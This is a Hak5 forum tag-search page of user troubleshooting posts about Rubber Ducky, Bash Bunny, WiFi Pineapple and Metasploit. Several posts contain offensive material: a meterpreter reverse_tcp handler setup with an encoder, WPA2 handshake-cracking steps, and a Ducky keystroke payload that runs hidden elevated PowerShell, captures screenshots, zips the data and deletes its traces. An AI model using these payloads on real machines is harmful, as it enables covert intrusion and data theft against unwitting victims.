Jump to content

Search the Community

Showing results for tags 'working'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 11 results

  1. i have a Wi-Fi pineapple Nano software version 2.7.0 but modules will not install please help
  2. Hello guys, I've tried everything and it seems that my USB Rubber Ducky just doesn't read any sd cards. By everything I mean: Tried 4 different SD Cards; Resetted the firmware using ducky-flasher; Changed the firmware from the original to Twin Duck; Tried different USB ports; Tried formatting the SD Cards (FAT/FAT32); Tried with empty SD Cards Tried with different inject.bin payloads; Tried with different Operating Systems; And finally, tried changing laptops. The Rubber Ducky is brand new, arrived a week or so ago and it worked great a few times while on the original firmware with simple payloads (fake update) in the sd card that came with it. Today, I decided to check it a little more, using ducky-flasher and following the instructions on github, I flashed the twin duck firmware and it worked once or twice but after checking the available payloads on github I tried again using it and it kept an always constant red led which I found out that means that it's not communicating with the SD Card. After trying a few thing on the list above, I discovered that the LED is always red with or without an SD Card (not sure if it's the default behavior for when there's no card present). What more can I do?
  3. Hello. I was messing around with metasploit. Im using Armitage. Everything worked fine before. I created a new payload and the old one stopped getting a stage. It just hangs at Starting the payload handler... The new one works fine. Need help fixing it please. Here's the Armitage log: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST PUBLIC IP LHOST => PUBLIC IP msf exploit(handler) > set LPORT 4443 LPORT => 4443 msf exploit(handler) > set Encoder x86/shikata_ga_nai Encoder => x86/shikata_ga_nai msf exploit(handler) > set EXITFUNC process EXITFUNC => process msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set Iterations 3 Iterations => 3 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on PUBLIC IP:4443 [*] Starting the payload handler...
  4. Hey guys? I have been trying the executable installer and usb exfiltrator for bash bunny but it's not working. The only payload that is working is the quickcreds payload. Is it because I installed the tools that the executable installer and usb exfiltrator are not working? I made sure that the "d.cmd", "e.cmd" and "i.vbs" files are in the ROOT of the the bashbunny and the "payload.txt" is in the "switch1" of the Bash Bunny. What is going on? Please help.
  5. My friend bet me that I couldn't shut down his computer with my rubber ducky, so I decided to prove him wrong. I started writing my code to shutdown his laptop (he has a dual booting linux and windows setup), it works well in linux but in windows it opens start and types e in the search bar instead of going across to shutdown. I have tried "RIGHTARROW" and "RIGHT" and it is using US keyboard. Code: REM Linux Shutdown (needs root user to be logged in) DELAY 550 ALT F2 DELAY 600 STRING poweroff ENTER DELAY 500 REM Windows Shutdown GUI DELAY 250 RIGHT RIGHT ENTER
  6. Hey Rubber Ducky users! So I have recently purchased a Rubber Ducky and started scripting. I went ahead and got some scripts of the github repo and none of them worked properly. Then I went ahead to write the scripts myself starting with a simple Hello World working my way up. On the project of making a wallpaper prank script i noticed that some commands weren't working. The REPLAY command and the MENU/APP command are not executed. As this is a fresh Rubber Ducky, could this be a problem of firmware or could it be because I am using Windows 10? Or maybe a diffrent reason? Thanks in advance!
  7. Hi folks, I haven't bought this product yet, but i am really interested to buy it. But before actually buying it if some body can explain how it is helpful in wifi password cracking (specially WPA2)it would be great. In kali 2.0 with Alfa Wifi adapter: 1. Put alfa wifi adapter in monitor 2. start airmon-ng 3. capture packet of target 4. de-auth some client and capture the handshake when client connect to the AP 5. BF the captured handshacke with either aircrack-ng or hashcat (definately hashcat becuase with aircrack-ng you are not reaching anywhere.) becuase aircrack-ng is hell slow. BF is not useful at all these days, No-one is using those simple passwords at all and with minimum length of 8 characters for wifi even with hashcat (100,000 hashes per second) it need 22 days for a 8 character brute force. So the question is from above simple five steps in kali, how Nano is useful. At which step nano comes in and helps cracking WPA2 password. Thanks,
  8. Hello, I recently relieved my Wifi Pineapple mark V and connected it it worked and started to install and boot up. my power went out while doing so and now I cant access my pineapple at all on the browser even though I was able to before. I reset it with the dip switches and now it show that its ready to install the updates on the pineapple but I cant access it through the browser. I have a mark V and a 2012 macbook pro (running mavricks)/ pc windows 8.1 Please help! Thank you
  9. So, today, with a new problem. EDIT: This is what KKP ( A keylogger ) logged when I hit the button to start the script ** [Ctrl][Alt][AltGr][up][End][Ctrl][Windows][Ctrl][AltGr][End][Alt][AltGr]#[Ctrl][AltGr][Alt][Ctrl][AltGr][Ctrl][AltGr][Ctrl][Windows][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows][AltGr][Alt][AltGr][PageUp][Windows]J[Ctrl][Windows][AltGr][Alt][AltGr][PageDown][Ctrl][Alt][Ctrl][AltGr] [NumLock][Ctrl][Alt][Windows][Alt][AltGr][Alt][Windows][AltGr][MenuClick][Ctrl][Windows][Ctrl][AltGr][PageUp][Alt][Ctrl][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][scrollLock][Ctrl][Alt][Windows][AltGr][Ctrl][Alt][AltGr][Ctrl][AltGr][Alt][Windows]>[Windows][Ctrl][AltGr][MenuClick][Ctrl][Alt][Windows][MenuClick][Ctrl][Alt][AltGr][Alt][Ctrl][AltGr][PageDown][Ctrl][AltGr][F12][Windows]J[Ctrl][Alt][AltGr][F11][Ctrl][AltGr][Delete][End][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][/scrollLock][Ctrl][Alt][AltGr][Cancel][Alt][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Alt][Windows][AltGr][Ctrl]>[Ctrl][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Ctrl][Ctrl][AltGr][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows] ** That's all that was logged. HELP! can I get a email address to hak5? Last time they just sent me here. Is there a way to contact Darren himself? It's sad when a company just sends you to a useless forum without even helping. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result. ALSO:; The microSD card wont save any new data?
  10. Ok here is my issue when i try enabling the Wlan0 it does not enable also when i try enabling wlan1 it says enabled but when i refresh it disables again. Could this be a Firmware issue as i just got it. Note I tried Resetting it to factory defaults already. Some Snap Shots http://imgur.com/LHqHFod,JiS3eTd#0 Note Firmware 1.0.4
  11. *Edited 12/19/12 Ok so here's pretty much what's up with my MK4, I can NOT see any beacon requests, no devices calling for their "remembered" ap's, not even my own devices! I also cannot connect to the MK4 (Posing as a client "Oh look, unlocked Wifi") Running a Mark IV Software running 2.7.0 Connecting it VIA Ubuntu 12.10 I use the pineapple WLAN out to an Apple Airport Express , which is wirelessly connected to my router. If necessary , I occasionally connect my laptop via local ethernet on the MK4. Wireless, MK4 Karma (Which doesn't work, I see ZERO beacon requests from other devices, including my own.), AutoStart, Cron Jobs, URL Snarf, DNS Spoof Ping results : Average 1.583 ms, no higher than 1.85 Is the problem repeatable (Every time the MK4 is on): Nothing had to be done to recreate things, I just suddenly stopped seeing beacon requests. I've actually re-flashed the pineapple twice, a 100% clean slate. Basic system log *Warning, it's pretty lengthy. Sorry, just providing anything that might be useful :) 00:01:14 Pineapple user.info sysinit: sh: write error: Invalid argument 00:01:14 Pineapple user.info sysinit: sh: write error: Invalid argument 00:01:14 Pineapple user.info sysinit: setting up led WLAN 00:01:14 Pineapple user.info sysinit: setting up led WAN 00:01:14 Pineapple user.info sysinit: setting up led USB 00:01:14 Pineapple user.info sysinit: setting up led LAN 00:01:14 Pineapple user.info sysinit: Selected interface 'wlan0' 00:01:14 Pineapple user.info sysinit: OK 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:wan/mode: nonexistent directory 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:wan/device_name: nonexistent directory 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:lan/mode: nonexistent directory 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:lan/device_name: nonexistent directory 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPOFFER(br-lan) 172.16.42.234 00:26:18:69:d2:ca 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPDISCOVER(br-lan) 172.16.42.234 00:26:18:69:d2:ca 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 00:01:13 Pineapple kern.info kernel: [ 73.450000] br-lan: port 2(wlan0) entered forwarding state 00:01:11 Pineapple kern.info kernel: [ 71.450000] br-lan: port 2(wlan0) entered forwarding state 00:01:11 Pineapple kern.info kernel: [ 71.440000] br-lan: port 2(wlan0) entered forwarding state 00:01:11 Pineapple kern.info kernel: [ 71.360000] device wlan0 entered promiscuous mode 00:01:10 Pineapple kern.info kernel: [ 70.550000] device wlan0 left promiscuous mode 00:01:10 Pineapple kern.info kernel: [ 70.550000] br-lan: port 2(wlan0) entered disabled state 00:01:10 Pineapple daemon.info dnsmasq[1676]: using nameserver 8.8.8.8#53 00:01:10 Pineapple daemon.info dnsmasq[1676]: using nameserver 208.67.222.222#53 00:01:10 Pineapple daemon.info dnsmasq[1676]: using nameserver 208.67.220.220#53 00:01:10 Pineapple daemon.info dnsmasq[1676]: using local addresses only for domain lan 00:01:10 Pineapple daemon.info dnsmasq[1676]: using local addresses only for domain lan 00:01:10 Pineapple daemon.info dnsmasq[1676]: started, version 2.62 cachesize 150 00:01:10 Pineapple daemon.info dnsmasq[1676]: reading /tmp/resolv.conf.auto 00:01:10 Pineapple daemon.info dnsmasq[1676]: read /etc/hosts - 1 addresses 00:01:10 Pineapple daemon.info dnsmasq[1676]: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP no-DHCPv6 no-Lua TFTP no-conntrack 00:01:10 Pineapple daemon.info dnsmasq-dhcp[1676]: read /etc/ethers - 0 addresses 00:01:10 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCP, IP range 172.16.42.100 -- 172.16.42.249, lease time 12h 00:01:07 Pineapple user.notice dnsmasq: DNS rebinding protection is active, will discard upstream RFC1918 responses! 00:01:07 Pineapple user.notice dnsmasq: Allowing 127.0.0.0/8 responses 00:01:05 Pineapple user.notice ifup: Allowing Router Advertisements on wan (eth1) 00:01:04 Pineapple daemon.notice netifd: wan (1284): Sending select for 192.168.0.15... 00:01:04 Pineapple daemon.notice netifd: wan (1284): Sending discover... 00:01:04 Pineapple daemon.notice netifd: wan (1284): Lease of 192.168.0.15 obtained, lease time 86400 00:01:04 Pineapple daemon.notice netifd: Interface 'wan' is now up 00:01:04 Pineapple authpriv.info dropbear[1577]: Running in background 00:01:03 Pineapple kern.info kernel: [ 63.140000] br-lan: port 2(wlan0) entered forwarding state 00:01:03 Pineapple cron.info crond[1560]: crond: crond (busybox 1.19.4) started, log level 5 00:01:01 Pineapple kern.info kernel: [ 61.140000] br-lan: port 2(wlan0) entered forwarding state 00:01:01 Pineapple kern.info kernel: [ 61.140000] br-lan: port 2(wlan0) entered forwarding state 00:01:01 Pineapple daemon.notice netifd: wan (1284): Sending discover... 02:16:22 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 02:14:35 Pineapple kern.info kernel: [ 6764.700000] eth0: link down 02:14:35 Pineapple kern.info kernel: [ 6764.700000] br-lan: port 1(eth0) entered disabled state 02:14:01 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 02:13:27 Pineapple kern.info kernel: [ 6696.200000] br-lan: port 1(eth0) entered forwarding state 02:13:25 Pineapple kern.info kernel: [ 6694.200000] eth0: link up (1000Mbps/Full duplex) 02:13:25 Pineapple kern.info kernel: [ 6694.200000] br-lan: port 1(eth0) entered forwarding state 02:13:25 Pineapple kern.info kernel: [ 6694.200000] br-lan: port 1(eth0) entered forwarding state 02:13:25 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 02:13:25 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 02:11:43 Pineapple cron.info crond[5628]: crond: crond (busybox 1.19.4) started, log level 5 02:10:46 Pineapple cron.info crond[5509]: crond: crond (busybox 1.19.4) started, log level 5 02:10:01 Pineapple user.notice root: CLEANUP: memory looking good 02:10:01 Pineapple user.notice root: CLEANUP: Karma log looking good 02:10:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 02:10:01 Pineapple cron.info crond[1560]: crond: USER root pid 5256 cmd /pineapple/scripts/cleanup.sh 02:09:40 Pineapple kern.info kernel: [ 6469.180000] eth0: link down 02:09:40 Pineapple kern.info kernel: [ 6469.180000] br-lan: port 1(eth0) entered disabled state 02:09:07 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 02:05:28 Pineapple authpriv.info dropbear[4290]: Exit (root): Exited normally 02:05:01 Pineapple user.notice root: CLEANUP: memory below threshold, dropping pagecache, dentries and inodes 02:05:01 Pineapple user.notice root: CLEANUP: Karma log looking good 02:05:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 02:05:01 Pineapple cron.info crond[1560]: crond: USER root pid 4891 cmd /pineapple/scripts/cleanup.sh 02:00:19 Pineapple authpriv.notice dropbear[4290]: Password auth succeeded for 'root' from 172.16.42.234:34499 02:00:16 Pineapple authpriv.info dropbear[4290]: Child connection from 172.16.42.234:34499 02:00:01 Pineapple user.notice root: CLEANUP: memory looking good 02:00:01 Pineapple user.notice root: CLEANUP: Karma log looking good 02:00:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 02:00:01 Pineapple cron.info crond[1560]: crond: USER root pid 4264 cmd /pineapple/scripts/cleanup.sh 01:55:01 Pineapple user.notice root: CLEANUP: memory looking good 01:55:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:55:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:55:01 Pineapple cron.info crond[1560]: crond: USER root pid 3820 cmd /pineapple/scripts/cleanup.sh 01:54:30 Pineapple kern.info kernel: [ 5559.370000] br-lan: port 1(eth0) entered forwarding state 01:54:29 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 01:54:29 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 01:54:28 Pineapple kern.info kernel: [ 5557.370000] eth0: link up (1000Mbps/Full duplex) 01:54:28 Pineapple kern.info kernel: [ 5557.370000] br-lan: port 1(eth0) entered forwarding state 01:54:28 Pineapple kern.info kernel: [ 5557.370000] br-lan: port 1(eth0) entered forwarding state 01:54:24 Pineapple kern.info kernel: [ 5552.870000] eth0: link down 01:54:24 Pineapple kern.info kernel: [ 5552.870000] br-lan: port 1(eth0) entered disabled state 01:52:59 Pineapple authpriv.info dropbear[3497]: Exit (root): Exited normally 01:51:06 Pineapple authpriv.notice dropbear[3497]: Password auth succeeded for 'root' from 172.16.42.234:60417 01:50:55 Pineapple authpriv.info dropbear[3497]: Child connection from 172.16.42.234:60417 01:50:16 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 01:50:16 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 01:50:15 Pineapple kern.info kernel: [ 5304.660000] br-lan: port 1(eth0) entered forwarding state 01:50:13 Pineapple kern.info kernel: [ 5302.660000] eth0: link up (1000Mbps/Full duplex) 01:50:13 Pineapple kern.info kernel: [ 5302.660000] br-lan: port 1(eth0) entered forwarding state 01:50:13 Pineapple kern.info kernel: [ 5302.660000] br-lan: port 1(eth0) entered forwarding state 01:50:01 Pineapple user.notice root: CLEANUP: memory looking good 01:50:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:50:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:50:01 Pineapple cron.info crond[1560]: crond: USER root pid 3429 cmd /pineapple/scripts/cleanup.sh 01:45:01 Pineapple user.notice root: CLEANUP: memory looking good 01:45:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:45:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:45:01 Pineapple cron.info crond[1560]: crond: USER root pid 3214 cmd /pineapple/scripts/cleanup.sh 01:43:37 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 01:43:27 Pineapple kern.info kernel: [ 4896.660000] eth0: link down 01:43:27 Pineapple kern.info kernel: [ 4896.660000] br-lan: port 1(eth0) entered disabled state 01:40:01 Pineapple user.notice root: CLEANUP: memory below threshold, dropping pagecache, dentries and inodes 01:40:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:40:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:40:01 Pineapple cron.info crond[1560]: crond: USER root pid 2836 cmd /pineapple/scripts/cleanup.sh 01:39:59 Pineapple kern.info kernel: [ 4688.380000] device br-lan entered promiscuous mode 01:35:01 Pineapple user.notice root: CLEANUP: memory looking good 01:35:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:35:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:35:01 Pineapple cron.info crond[1560]: crond: USER root pid 2645 cmd /pineapple/scripts/cleanup.sh 01:30:01 Pineapple user.notice root: CLEANUP: memory looking good 01:30:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:30:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:30:01 Pineapple cron.info crond[1560]: crond: USER root pid 2528 cmd /pineapple/scripts/cleanup.sh 01:25:01 Pineapple user.notice root: CLEANUP: memory looking good 01:25:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:25:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:25:01 Pineapple cron.info crond[1560]: crond: USER root pid 2411 cmd /pineapple/scripts/cleanup.sh 01:20:01 Pineapple user.notice root: CLEANUP: memory looking good 01:20:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:20:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:20:01 Pineapple cron.info crond[1560]: crond: USER root pid 2294 cmd /pineapple/scripts/cleanup.sh 01:15:01 Pineapple user.notice root: CLEANUP: memory looking good 01:15:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:15:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:15:01 Pineapple cron.info crond[1560]: crond: USER root pid 2177 cmd /pineapple/scripts/cleanup.sh 01:10:01 Pineapple user.notice root: CLEANUP: memory looking good 01:10:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:10:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:10:01 Pineapple cron.info crond[1560]: crond: USER root pid 2060 cmd /pineapple/scripts/cleanup.sh 01:05:01 Pineapple user.notice root: CLEANUP: memory looking good 01:05:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:05:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:05:01 Pineapple cron.info crond[1560]: crond: USER root pid 1969 cmd /pineapple/scripts/cleanup.sh 01:00:01 Pineapple user.notice root: CLEANUP: memory looking good 01:00:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:00:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:00:01 Pineapple cron.info crond[1560]: crond: USER root pid 1957 cmd /pineapple/scripts/cleanup.sh 00:55:01 Pineapple user.notice root: CLEANUP: memory looking good 00:55:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:55:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:55:01 Pineapple cron.info crond[1560]: crond: USER root pid 1945 cmd /pineapple/scripts/cleanup.sh 00:50:01 Pineapple user.notice root: CLEANUP: memory looking good 00:50:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:50:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:50:01 Pineapple cron.info crond[1560]: crond: USER root pid 1933 cmd /pineapple/scripts/cleanup.sh 00:45:01 Pineapple user.notice root: CLEANUP: memory looking good 00:45:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:45:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:45:01 Pineapple cron.info crond[1560]: crond: USER root pid 1921 cmd /pineapple/scripts/cleanup.sh 00:40:01 Pineapple user.notice root: CLEANUP: memory looking good 00:40:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:40:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:40:01 Pineapple cron.info crond[1560]: crond: USER root pid 1909 cmd /pineapple/scripts/cleanup.sh 00:35:01 Pineapple user.notice root: CLEANUP: memory looking good 00:35:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:35:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:35:01 Pineapple cron.info crond[1560]: crond: USER root pid 1897 cmd /pineapple/scripts/cleanup.sh 00:30:01 Pineapple user.notice root: CLEANUP: memory looking good 00:30:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:30:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:30:01 Pineapple cron.info crond[1560]: crond: USER root pid 1885 cmd /pineapple/scripts/cleanup.sh 00:25:01 Pineapple user.notice root: CLEANUP: memory looking good 00:25:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:25:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:25:01 Pineapple cron.info crond[1560]: crond: USER root pid 1873 cmd /pineapple/scripts/cleanup.sh 00:24:03 Pineapple user.info autossh[1317]: ssh exited with status 1; autossh exiting 00:23:53 Pineapple cron.err crond[1560]: time disparity of 22599382 minutes detected
×
×
  • Create New...